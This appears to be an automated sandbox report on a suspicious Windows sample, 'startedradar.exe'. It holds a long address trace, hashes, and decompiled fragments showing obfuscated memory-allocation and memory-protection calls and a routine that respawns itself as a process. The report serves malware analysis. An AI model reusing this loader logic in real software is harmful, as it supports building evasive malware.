0x00000000
0x00000000
0x00115495
0x0011633c
0x0011633c
0x00000000
0x0011633c
0x00115472
0x00116157
0x00116157
0x0011615c
0x0011615f
0x001161d6
0x001161d6
0x001161dd
0x001161e0
0x001161e3
0x001161e8
0x001161ee
0x001161f1
0x001161f4
0x001161f7
0x00000000
0x00116161
0x00116161
0x00116168
0x00116170
0x00116173
0x00116175
0x0011618f
0x0011618f
0x00116192
0x00000000
0x00116198
0x00116198
0x0011619d
0x0011619d
0x001161a0
0x001161a0
0x001161ae
0x001161b9
0x001161ba
0x001161bd
0x001161c0
0x001161c2
0x00000000
0x00000000
0x001161c8
0x001161c8
0x001161c9
0x001161cb
0x00000000
0x001161d1
0x001161d1
0x001161d1
0x00000000
0x001161d1
0x00000000
0x001161cb
0x00000000
0x001161a0
0x00116177
0x00116177
0x00116177
0x0011617a
0x0011617c
0x001153df
0x001153df
0x001153e2
0x00116347
0x00116347
0x00000000
0x00000000
0x00000000
0x00000000
0x00116182
0x00116182
0x00116182
0x00116184
0x00000000
0x0011618a
0x0011618a
0x00000000
0x0011618a
0x00116184
0x0011617c
0x00000000
0x001153e8
0x001153eb
0x001153ed
0x001153ef
0x001153f0
0x001153f2
0x001153f5
0x001153f8
0x001153fb
0x001153fb
0x00116161
0x00000000
0x0011615f
0x00116113
0x00116113
0x00116113
0x00116115
0x0011613a
0x0011613f
0x0011613f
0x00116144
0x00116146
0x00116148
0x00116148
0x00116148
0x0011614b
0x00000000
0x00116117
0x00116117
0x00116117
0x00116117
0x0011611a
0x00000000
0x00000000
0x00116120
0x00116125
0x00116127
0x00116128
0x0011612b
0x0011612d
0x00116130
0x00116133
0x00116136
0x00116138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00116138
0x00116331
0x00116331
0x00000000
0x00116331
0x00116115
0x0011585f
0x0011585f
0x0011585f
0x0011585f
0x00115863
0x00000000
0x00000000
0x00115869
0x00115869
0x0011586c
0x0011588f
0x00115891
0x00115894
0x00115897
0x0011589a
0x0011589d
0x0011589d
0x0011589f
0x001158a2
0x001158a5
0x001158a8
0x00115a6b
0x00115a6b
0x00115a6e
0x00116364
0x00116364
0x0011636b
0x00000000
0x00115a74
0x00115a74
0x00115a74
0x00115a77
0x00115b46
0x00115b46
0x00115b46
0x00115b48
0x00115b48
0x00115b48
0x00115b4b
0x00115b4e
0x00000000
0x00000000
0x00115b54
0x00115b54
0x00115b5b
0x00115b5e
0x00115b60
0x00115b8f
0x00115b8f
0x00115b9a
0x00115ba2
0x00115ba5
0x00115ba8
0x00115baf
0x00115bb1
0x00115bb3
0x00115bb5
0x00115bb8
0x00115bc2
0x00115bc5
0x00115bc7
0x00115bca
0x00000000
0x00115b62
0x00115b62
0x00115b62
0x00115b62
0x00115b65
0x00000000
0x00000000
0x00115b6b
0x00115b70
0x00115b72
0x00115b73
0x00115b76
0x00115b78
0x00115b7b
0x00115b7e
0x00115b81
0x00115b88
0x00115b8b
0x00115b8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115b8d
0x00116285
0x00116285
0x00000000
0x00116285
0x00000000
0x00115b60
0x00115bd0
0x00115bd5
0x00115bde
0x00115be4
0x00115be7
0x00115bea
0x00115bea
0x00115bec
0x00115bec
0x00115bec
0x00115bef
0x00115bf2
0x00000000
0x00000000
0x00115bf4
0x00115bf4
0x00115bf7
0x00115c1a
0x00115c1f
0x00115c22
0x00115c25
0x00115c28
0x00115c2b
0x00115c2e
0x00115c35
0x00115c3f
0x00000000
0x00115bf9
0x00115bf9
0x00115bf9
0x00115bf9
0x00115bfc
0x00000000
0x00000000
0x00115c02
0x00115c07
0x00115c09
0x00115c0a
0x00115c0c
0x00115c0f
0x00115c12
0x00115c15
0x00115c18
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115c18
0x00116290
0x00116290
0x00000000
0x00116290
0x00000000
0x00115bf7
0x00115c42
0x00115c42
0x00000000
0x00115a7d
0x00115a7d
0x00115a7d
0x00115a82
0x00115a83
0x00115a84
0x00000000
0x00115a84
0x00115a77
0x001158ae
0x001158ae
0x001158b0
0x001158b3
0x001158b5
0x001158dc
0x001158de
0x001158e1
0x001158e3
0x001158e5
0x001158e8
0x001158e8
0x001158ea
0x001158ea
0x001158ea
0x001158ed
0x001158f0
0x00000000
0x00000000
0x001158f2
0x001158f2
0x001158f4
0x00115932
0x00115932
0x00115935
0x0011624f
0x0011624f
0x00000000
0x0011593b
0x0011593b
0x0011593b
0x0011593d
0x0011593e
0x00115945
0x00115946
0x00000000
0x00115946
0x001158f6
0x001158f6
0x001158f6
0x001158f9
0x0011591f
0x0011591f
0x00115926
0x00115929
0x0011592c
0x0011592d
0x00000000
0x001158fb
0x001158fb
0x001158fb
0x001158fb
0x001158fe
0x00000000
0x00000000
0x00115904
0x00115909
0x0011590b
0x0011590c
0x0011590e
0x00115911
0x00115914
0x00115917
0x0011591a
0x00000000
0x0011591c
0x0011591c
0x0011591c
0x00000000
0x0011591c
0x00000000
0x0011591a
0x00116244
0x00116244
0x00000000
0x00116244
0x001158f9
0x00000000
0x001158f4
0x0011594b
0x0011595e
0x00115965
0x0011597a
0x0011597d
0x00116352
0x00116352
0x00116359
0x00000000
0x00115983
0x00115983
0x00115983
0x00115986
0x00115986
0x00115986
0x00115988
0x00000000
0x00000000
0x0011598e
0x0011598e
0x00115990
0x001159ec
0x001159ec
0x001159ef
0x001159ef
0x001159ef
0x001159f1
0x00000000
0x00000000
0x00115a01
0x00115a01
0x00115a04
0x00115a06
0x00115a20
0x00115a20
0x00115a23
0x00115a25
0x00116277
0x00116277
0x0011627a
0x00000000
0x00115a2b
0x00115a2b
0x00115a2b
0x00115a30
0x00115a32
0x00115a36
0x00115a39
0x00115a3b
0x00115a44
0x00115a3d
0x00115a3d
0x00115a3f
0x00115a3f
0x00115a46
0x00115a4b
0x00115a4b
0x00115a54
0x00115a59
0x00115a5b
0x00115a5e
0x00115a61
0x00115a63
0x00115a66
0x00000000
0x00115a66
0x00115a08
0x00115a08
0x00115a08
0x00115a0b
0x00115a12
0x00000000
0x00115a12
0x00000000
0x00115a06
0x001159f3
0x001159f3
0x001159f8
0x00000000
0x00115992
0x00115992
0x00115992
0x00115995
0x001159b8
0x001159b8
0x001159bb
0x001159be
0x001159c1
0x001159c4
0x001159cc
0x001159cf
0x001159d2
0x001159d5
0x00116265
0x00116265
0x0011626c
0x00000000
0x001159db
0x001159db
0x001159de
0x001159e1
0x001159e6
0x001159e7
0x00000000
0x001159e7
0x00115997
0x00115997
0x00115997
0x00115997
0x0011599a
0x00000000
0x00000000
0x001159a0
0x001159a5
0x001159a7
0x001159a8
0x001159aa
0x001159ad
0x001159b0
0x001159b3
0x001159b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001159b6
0x0011625a
0x0011625a
0x00000000
0x0011625a
0x00115995
0x00000000
0x00115990
0x00000000
0x00115986
0x001158b7
0x001158b7
0x001158b7
0x001158b7
0x001158ba
0x00000000
0x00000000
0x001158c0
0x001158c5
0x001158c7
0x001158ca
0x001158cc
0x001158cf
0x001158d2
0x001158d5
0x001158d8
0x001158da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001158da
0x00116239
0x00116239
0x00000000
0x00116239
0x001158b5
0x0011586e
0x0011586e
0x0011586e
0x0011586e
0x00115871
0x00000000
0x00000000
0x00115877
0x0011587c
0x0011587e
0x0011587f
0x00115881
0x00115884
0x00115887
0x0011588a
0x0011588d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0011588d
0x0011622e
0x0011622e
0x00116422
0x00116422
0x0011642b
0x00116430
0x00116430
0x00116433
0x00116436
0x00116439
0x0011643b
0x0011643b
0x0011643e
0x00116440
0x0011644d
0x0011644d
0x00116450
0x00116452
0x00116454
0x00116454
0x00116454
0x00116457
0x00000000
0x00000000
0x00116459
0x00116459
0x0011645a
0x0011645d
0x0011645f
0x00000000
0x00000000
0x00000000
0x0011645f
0x00116454
0x00116452
0x0011643e
0x00116439
0x00000000
0x0011586c
0x001162b1
0x001162b3
0x001162b6
0x001162b8
0x001162e2
0x001162e2
0x001162e7
0x001162ea
0x001162ec
0x001162ee
0x001162f1
0x001162f3
0x001162f5
0x001162f5
0x001162f5
0x001162f8
0x00000000
0x00000000
0x001162fa
0x001162fa
0x001162fb
0x001162fe
0x00116300
0x00000000
0x00000000
0x00000000
0x00116300
0x001162f5
0x00116302
0x00116307
0x00116307
0x0011630b
0x0011630e
0x00116311
0x00116314
0x00116316
0x00116319
0x0011631d
0x00116320
0x00116324
0x00116442
0x00116442
0x00116442
0x00116444
0x0011644a
0x0011644a
0x00000000
0x0011632a
0x0011632a
0x0011632a
0x001163f3
0x001163f3
0x001163f3
0x001163f6
0x001163f9
0x00000000
0x00000000
0x001163fb
0x001163fb
0x001163fd
0x0011640a
0x0011640a
0x0011640d
0x00116410
0x001163d7
0x001163d7
0x001163dd
0x001163dd
0x001163e0
0x00000000
0x00116412
0x00116412
0x001163ba
0x001163ba
0x001163ba
0x001163bd
0x00000000
0x00000000
0x001163bf
0x001163c4
0x001163c6
0x001163c9
0x001163cb
0x001163cc
0x001163cf
0x001163d2
0x00000000
0x001163d4
0x001163d4
0x001163d4
0x00000000
0x001163d4
0x00000000
0x001163d2
0x0011641c
0x0011641c
0x00000000
0x0011641c
0x001163ff
0x001163ff
0x001163ff
0x00116402
0x00116414
0x00116414
0x00000000
0x00116404
0x00116404
0x00116404
0x00116407
0x001163e3
0x001163e3
0x001163ec
0x001163ef
0x001163ef
0x001163f0
0x00000000
0x001163f0
0x00116402
0x00000000
0x001163fd
0x00000000
0x001163f3
0x001162c0
0x00000000
0x001162c0
0x001162c0
0x001162c0
0x001162c3
0x00000000
0x00000000
0x001162c9
0x001162ce
0x001162d0
0x001162d3
0x001162d5
0x001162d8
0x001162db
0x001162de
0x001162e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001162e0
0x001163b2
0x001163b2
0x00000000
0x001163b2
0x001162b8
0x00115685
0x00115685
0x00115685
0x00115688
0x0011568a
0x0011568e
0x00115690
0x00115693
0x00115696
0x0011569e
0x001156a3
0x001156a6
0x001156a6
0x001156a9
0x001156a9
0x001156b3
0x001156bb
0x001156be
0x001156c0
0x001156c9
0x001156c9
0x001156ce
0x001156cf
0x001156d0
0x001156d1
0x001156d1
0x001156d5
0x001156d7
0x001156dd
0x001156e5
0x001156e5
0x001156e9
0x001156ec
0x001156c2
0x001156c2
0x001156c4
0x001156c4
0x001156ef
0x001156ef
0x001156f2
0x001156f4
0x001156f9
0x001156fc
0x001156fe
0x00115701
0x00115707
0x00115847
0x00115847
0x00115847
0x00115847
0x00000000
0x0011570d
0x0011570d
0x0011570d
0x00115710
0x00115716
0x00115719
0x001155e8
0x001155e8
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x0011556e
0x0011556e
0x0011556e
0x00115572
0x00115577
0x00115578
0x0011557a
0x0011557c
0x0011557f
0x00115582
0x00115584
0x001155d6
0x001155d6
0x001155db
0x001155df
0x001155e2
0x001155e2
0x001155e5
0x001155e5
0x001155e5
0x001155e5
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x001155b1
0x001155b1
0x001155b4
0x001155b7
0x001155ba
0x001155bd
0x001155c0
0x001155c0
0x001155c4
0x001155c9
0x001155ca
0x001155cc
0x001155ce
0x001155d1
0x001155d4
0x00000000
0x00000000
0x00000000
0x001155d4
0x00115707
0x0011567f
0x00116461
0x00116461
0x00116464
0x00116466
0x0011646b
0x0011646e
0x00116471
0x00116474
0x00116476
0x00116479
0x00116483
0x0011648e
0x00116491
0x00116495
0x0011649b
0x001164a1
0x001164a7
0x001164aa
0x001164ad
0x001164b2
0x001164b5
0x001164b7
0x001164bd
0x001164bd
0x001164bf
0x001164c5
0x001164c5
0x001164cf
0x001164d5
0x001164de
0x001164e1
0x001164e4
0x001164e6
0x001164ea
0x001164ed
0x001164f3
0x001164f3
0x001164f5
0x001164f5
0x001164f5
0x001164f7
0x001164fa
0x001164fd
0x00116503
0x00116503
0x00116508
0x00116509
0x0011650a
0x0011650b
0x0011650b
0x0011650b
0x00116510
0x00116510
0x00116513
0x00116516
0x00116521
0x0011652c
0x00116537
0x00116542
0x0011654d
0x00116558
0x00116563
0x00116568
0x0011656b
0x0011656d
0x00116572
0x00116574
0x00116574
0x00116579
0x0011657c
0x0011657c
0x0011657f
0x0011657f
0x00116581
0x00116584
0x00116586
0x00116588
0x0011658c
0x0011658f
0x00116591
0x00116591
0x00116596
0x0011659e
0x001165a2
0x001165a2
0x001165a6
0x001165b0
0x001165b0
0x001165b3
0x001165b5
0x001165b9
0x001165bb
0x001165be
0x001165c0
0x001165c2
0x001165c2
0x001165c2
0x001165c5
0x001165c8
0x001165cb
0x001165ce
0x001165d1
0x001165d1
0x001165d4
0x001165d4
0x001165d6
0x001165d8
0x001165de
0x001165e0
0x001165e2
0x001165e2
0x001165e3
0x001165e3
0x001165e6
0x001165e9
0x001165eb
0x001165eb
0x001165eb
0x001165ed
0x001165f2
0x001165fd
0x00116609
0x0011660f
0x00116611
0x00116611
0x00116611
0x00116614
0x00116619
0x0011661c
0x0011661c
0x00116625
0x0011662a
0x0011662a
0x0011662b
0x0011662e
0x00116630
0x00116633
0x00116635
0x00116637
0x0011663b
0x0011663d
0x00116645
0x00116645
0x00116645
0x0011663b
0x00116635
0x001164bf
0x00116648
0x00116650
0x00000000
0x0011571e
0x0011571e
0x00115721
0x001157d3
0x001157da
0x001157e2
0x001157e5
0x001157e7
0x001157f8
0x001157f8
0x001157fd
0x001157fe
0x001157ff
0x00115800
0x00115800
0x00115804
0x00115806
0x0011580c
0x00115814
0x00115814
0x00115818
0x0011581b
0x001157e9
0x001157e9
0x001157eb
0x001157ee
0x001157f3
0x001157f3
0x0011581e
0x0011581e
0x00115820
0x00115822
0x00115825
0x00115828
0x0011582e
0x00000000
0x00115830
0x00115830
0x00115830
0x00115833
0x00115836
0x0011621c
0x0011621c
0x00116223
0x00000000
0x0011583c
0x0011583c
0x0011583c
0x0011583f
0x00000000
0x0011583f
0x00115836
0x00115727
0x00115727
0x00115727
0x0011572a
0x001157af
0x001157af
0x001157b6
0x001157b9
0x001157be
0x001157c4
0x001157c7
0x001157ca
0x001157ca
0x001157cd
0x00000000
0x00115730
0x00115730
0x00115730
0x00115732
0x00115737
0x0011573f
0x00115741
0x00115754
0x00115754
0x00115757
0x00000000
0x00115759
0x00115759
0x0011575e
0x00115761
0x00115761
0x0011576f
0x0011577a
0x0011577b
0x0011577e
0x00115780
0x00000000
0x00000000
0x00115782
0x00115782
0x00115785
0x00115787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115787
0x00000000
0x00115761
0x00115743
0x00115743
0x00115743
0x00115746
0x00115748
0x00115789
0x00115789
0x0011578c
0x0011578c
0x0011578f
0x00116211
0x00116211
0x00000000
0x00000000
0x00000000
0x00000000
0x0011574a
0x0011574a
0x0011574a
0x0011574c
0x001157d0
0x001157d0
0x00000000
0x00115752
0x00115752
0x00000000
0x00115752
0x0011574c
0x00115748
0x00000000
0x00115795
0x00115798
0x0011579a
0x0011579c
0x0011579d
0x0011579f
0x001157a2
0x001157a5
0x001157a8
0x001157a8
0x00000000
0x001157ad
0x0011572a
0x00000000
0x00115721
0x001155e8
0x00115c54
0x00115c63
0x00115c6d
0x00115c83
0x00115c99
0x00115ca2
0x00115ca7
0x00115caa
0x00115cad
0x00115cb2
0x00115cb4
0x00115cb4
0x00115cc0
0x00115cc0
0x00115cc0
0x00115cc4
0x00115cc5
0x00115ccc
0x00115cc0
0x00115cd0
0x00115cd0
0x00115cd5
0x00115cd6
0x00115cd7
0x00115cd8
0x00115cd9
0x00115cd9
0x00115cdf
0x00115ce5
0x00115ce8
0x00115cf0
0x00115cf0
0x00115cf0
0x00115cf9
0x00115cfb
0x00115cfd
0x00115d04
0x00115d07
0x00115d10
0x00115d17
0x00115d19
0x00115d1c
0x00115d25
0x00115d27
0x00115d2e
0x00115d31
0x00115d3c
0x00115d3f
0x00115d45
0x00115d48
0x00115d51
0x00115d5c
0x00115d5c
0x00115d5f
0x00115d66
0x00115d70
0x00115d76
0x00115d76
0x00115d80
0x00115d80
0x00115d85
0x00115d85
0x00115d89
0x00115d8e
0x00115d94
0x00115d94
0x00115d9b
0x00115d9f
0x00115da6
0x00115dab
0x00000000
0x00115db0
0x00115db0
0x00115dbb
0x00115dbe
0x00115dbf
0x00115dc1
0x00115dc4
0x00115dc8
0x00115dc8
0x00115dcb
0x00115dce
0x00115e1d
0x00115e2d
0x00115e30
0x00115e33
0x00115e36
0x00115e39
0x00115e3c
0x00115e3e
0x00115e43
0x00115e46
0x00115e48
0x00115e48
0x00115e4b
0x00115e4e
0x00115e4e
0x00115e51
0x00115e51
0x00115e54
0x00115e57
0x00115e59
0x00115e59
0x00115e59
0x00115e5c
0x00115e5f
0x00115e62
0x00115e62
0x00115e62
0x00115e70
0x00115e75
0x00115e79
0x00115e7c
0x00115e94
0x00115e7e
0x00115e81
0x00115e85
0x00115e88
0x00115e8a
0x00115e8d
0x00115e90
0x00115e90
0x00115e97
0x00115e97
0x00115e97
0x00115e97
0x00115e97
0x00115e9c
0x00115e9f
0x00115e9f
0x00115ea1
0x00115ea6
0x00115ea6
0x00115eab
0x00115dd0
0x00115dd0
0x00115dd7
0x00115dda
0x00115de3
0x00115de9
0x00115de9
0x00115dee
0x00115def
0x00115df0
0x00115df1
0x00115df1
0x00115df6
0x00115dff
0x00115e05
0x00115e05
0x00115e05
0x00115e08
0x00115e0a
0x00115e0d
0x00115e15
0x00115e15
0x00115de3
0x00115dce
0x00115eb3
0x00115eb3
0x00115eb6
0x00115eb7
0x00115ec1
0x00115ec6
0x00115ec6
0x00115ec7
0x00115ecb
0x001160e6
0x001160e6
0x00000000
0x00115ed1
0x00115ed1
0x00115ed1
0x00115ed3
0x00115ed3
0x00115ed3
0x00115ed6
0x00115ed6
0x00115edc
0x00115ee1
0x00000000
0x00000000
0x00115ee7
0x00115eea
0x00115fa2
0x00115fa9
0x00115fb1
0x00115fb6
0x00115fc7
0x00000000
0x00115fd0
0x00115fd0
0x00115fd0
0x00115fd5
0x00115fd7
0x00115fde
0x00115fe6
0x00115fe9
0x00115fe9
0x00115fb8
0x00115fb8
0x00115fba
0x00115fbd
0x00115fc2
0x00115fc2
0x00115fed
0x00115fed
0x00115fef
0x00115ff1
0x00115ff4
0x00115ffa
0x0011600c
0x0011600c
0x0011601c
0x0011601c
0x00116023
0x00116026
0x00116028
0x00116050
0x0011605e
0x00116061
0x00116068
0x0011606b
0x0011606d
0x00116071
0x00116074
0x00116077
0x00116083
0x00116083
0x00116079
0x00116079
0x00116079
0x00116085
0x00116090
0x00116099
0x0011609c
0x0011609e
0x00115ed3
0x00115ed3
0x00000000
0x0011602a
0x0011602a
0x0011602a
0x0011602a
0x0011602d
0x00000000
0x00000000
0x00116033
0x00116038
0x0011603a
0x0011603b
0x0011603e
0x00116040
0x00116043
0x00116046
0x00116049
0x0011604b
0x00000000
0x0011604d
0x0011604d
0x0011604d
0x00000000
0x0011604d
0x00000000
0x0011604b
0x001162a6
0x001162a6
0x00000000
0x001162a6
0x0011600e
0x0011600e
0x0011600e
0x00116011
0x00116013
0x00116388
0x00116388
0x0011638b
0x00000000
0x00116019
0x00116019
0x00116019
0x00000000
0x00116019
0x00116013
0x00115ffc
0x00115ffc
0x00115ffc
0x00115fff
0x00116006
0x00000000
0x00116006
0x00115ef0
0x00115ef0
0x00115ef8
0x00115f7e
0x00115f7e
0x00115f85
0x00115f88
0x00115f8d
0x00115f93
0x00115f96
0x00115f99
0x00115f99
0x00115f9c
0x00000000
0x00115efe
0x00115efe
0x00115efe
0x00115f00
0x00115f05
0x00115f0f
0x00115f22
0x00115f22
0x00115f25
0x00000000
0x00115f27
0x00115f27
0x00115f2c
0x00115f2c
0x00115f30
0x00115f30
0x00115f3e
0x00115f49
0x00115f4a
0x00115f4d
0x00115f4f
0x00000000
0x00000000
0x00115f51
0x00115f51
0x00115f54
0x00115f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115f56
0x00000000
0x00115f30
0x00115f11
0x00115f11
0x00115f11
0x00115f16
0x00115f58
0x00115f58
0x00115f5b
0x00115f5e
0x0011629b
0x0011629b
0x00000000
0x00000000
0x00000000
0x00000000
0x00115f18
0x00115f18
0x00115f1a
0x00115f9f
0x00115f9f
0x00000000
0x00115f20
0x00115f20
0x00000000
0x00115f20
0x00115f1a
0x00115f16
0x00000000
0x00115f64
0x00115f67
0x00115f69
0x00115f6b
0x00115f6c
0x00115f6e
0x00115f71
0x00115f74
0x00115f77
0x00000000
0x00115f7c
0x00115ef8
0x00000000
0x00115eea
0x001160a6
0x001160a9
0x001160ac
0x001160ae
0x001160b0
0x00116396
0x00116396
0x00116399
0x00000000
0x001160b6
0x001160b6
0x001160c2
0x001160d3
0x001160d3
0x001160dd
0x001160e3
0x00000000
0x001160e3
0x00000000
0x001160b0
0x00115ed3
0x00116376
0x00116376
0x00116376
0x0011637d
0x00000000
0x0011637d
0x00000000
0x00115d51

APIs

memset.NTDLL ref: 00115A98
memset.NTDLL ref: 00115C6D
memset.NTDLL ref: 00115C83
memset.NTDLL ref: 00115C99

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: b0006f7fa6d665da2df8ac4f647e52c8d550a8b2f33d6be83449110db814a644
Instruction ID: 50b74e288a6b533ee89e2f720f2b889fee455b8c34c24b43e4c876207d81394c
Opcode Fuzzy Hash: b0006f7fa6d665da2df8ac4f647e52c8d550a8b2f33d6be83449110db814a644
Instruction Fuzzy Hash: 70314DB2E10F82E7E7098F64C801BA4B771BBE9304F205316E5C495A42E778A6E1C7D0

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: startedradar.exe PID: 3784 Parent PID: 408 startedradar.exeUNIQUE

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.4%
Total number of Nodes:	371
Total number of Limit Nodes:	3

Executed Functions

Function 002821B8, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 60
memorynativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 00282261

Strings

YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 002821CD
w, xrefs: 00282211
l, xrefs: 00282221
l, xrefs: 00282219
Z, xrefs: 0028220D
A, xrefs: 00282215
l, xrefs: 0028221D
r, xrefs: 00282201
$, xrefs: 002821E5
y, xrefs: 00282205

Memory Dump Source

Source File: 00000008.00000002.1686354466.00280000.00000040.sdmp, Offset: 00280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_280000_startedradar.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: $$A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2167126740-65669930
Opcode ID: a4425e69118e8466809f93b655880cdc3432181971a869f4b2726e76aa48e568
Instruction ID: 9d44105851267e2969f68761bc2b8cf1ea22b374f4d27eb8fa17e8857fb2ba8b
Opcode Fuzzy Hash: a4425e69118e8466809f93b655880cdc3432181971a869f4b2726e76aa48e568
Instruction Fuzzy Hash: 7E2119B0908388DFDB00DFA8D48468EBFF1AF85314F10851EE898AB391C3759559CB92

Uniqueness

Uniqueness Score: 3.75%

Function 002820FD, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61
nativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 002821A2

Strings

Z, xrefs: 00282146
M, xrefs: 00282152
V, xrefs: 0028214E
yyProtectairtual emory, xrefs: 00282112
w, xrefs: 0028214A
@, xrefs: 0028212A

Memory Dump Source

Source File: 00000008.00000002.1686354466.00280000.00000040.sdmp, Offset: 00280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_280000_startedradar.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2706961497-3039725267
Opcode ID: 667ae49f7ed6a1bdfba566d5b0f4633c88282ad28b9e84d2a093da52ecd7b7ca
Instruction ID: 8288cad7ea4f32dfd6195d7100de92b1440b7025703e6132ae903421c42a7d49
Opcode Fuzzy Hash: 667ae49f7ed6a1bdfba566d5b0f4633c88282ad28b9e84d2a093da52ecd7b7ca
Instruction Fuzzy Hash: 1921F2B4D083489FCB00DFA8C48469EBBF4EB48354F10892AE859AB391D3759959CF52

Uniqueness

Uniqueness Score: 3.75%

Function 002A11F3, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E002A11F3(void* __edi) {
				void* __esi;
				void* _t7;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t17 = __edi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x18);
				_push(0x80);
				_t7 = L002A1E80(_t19); // executed
				if(_t7 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					CloseHandle( *(_t21 - 0x18));
					CloseHandle( *(_t21 - 0x14));
				}
				CloseHandle(_t19);
				CloseHandle(_t14);
				return _t17;
			}

0x002a11f3
0x002a11f3
0x002a11fc
0x002a11fd
0x002a1208
0x002a1212
0x002a1217
0x002a1220
0x002a1229
0x002a1229
0x002a1230
0x002a1237
0x002a1245

APIs

GetModuleFileNameW.KERNEL32 ref: 002A11F3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A1217
CloseHandle.KERNEL32(?), ref: 002A1220
CloseHandle.KERNEL32(?), ref: 002A1229
CloseHandle.KERNEL32 ref: 002A1230
CloseHandle.KERNEL32 ref: 002A1237

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 6c610825db6cc11e0b5e869d0839a6180552d642beee24dec886234da6cf99a8
Instruction ID: 4251caf986680fcaf85488fdf27092b0cc0a9b9c6688d333035f58b6139f414b
Opcode Fuzzy Hash: 6c610825db6cc11e0b5e869d0839a6180552d642beee24dec886234da6cf99a8
Instruction Fuzzy Hash: 23E06D33600017DBCB007BE4FC8D9ADBB38EF09727F408222FA05D00A2DF2149658B61

Uniqueness

Uniqueness Score: 0.01%

Function 002A1E91, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38
processCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E002A1E91(WCHAR* __esi) {
				int _t11;
				void* _t20;

				memset();
				 *(_t20 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t20 + 8), 0, 0, _t20 - 0x58, _t20 - 0x10); // executed
				if(_t11 == 0) {
					goto 0x5a05fe;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t20 + 0xc)) == 0) {
						CloseHandle( *(_t20 - 0x10));
						CloseHandle( *(_t20 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x002a1e91
0x002a1e9a
0x002a1eb9
0x002a1ec1
0x002a1ef9
0x002a1efe
0x002a1eff
0x002a1ec3
0x002a1ec8
0x002a1ee0
0x002a1ee9
0x002a1ef8
0x002a1eca
0x002a1eca
0x002a1ecf
0x002a1edc
0x002a1edc
0x002a1ec8

APIs

memset.NTDLL ref: 002A1E91
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 002A1EB9
CloseHandle.KERNEL32(?), ref: 002A1EE0
CloseHandle.KERNEL32(?), ref: 002A1EE9

Strings

D, xrefs: 002A1E9A

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 0a86c06b1d137478841ce5601b7029db7f4f24f829c25ddbb27ded4a5c9e7fa8
Instruction ID: f1a6beb57a4e5d951448279c780e39d4732fac4579d4f054cc678d335f2e79e6
Opcode Fuzzy Hash: 0a86c06b1d137478841ce5601b7029db7f4f24f829c25ddbb27ded4a5c9e7fa8
Instruction Fuzzy Hash: F9F0F032A50209EBEB205FD8EC49BED7B78FB04700F104616FE04E92D0DBB199608B84

Uniqueness

Uniqueness Score: 0.08%

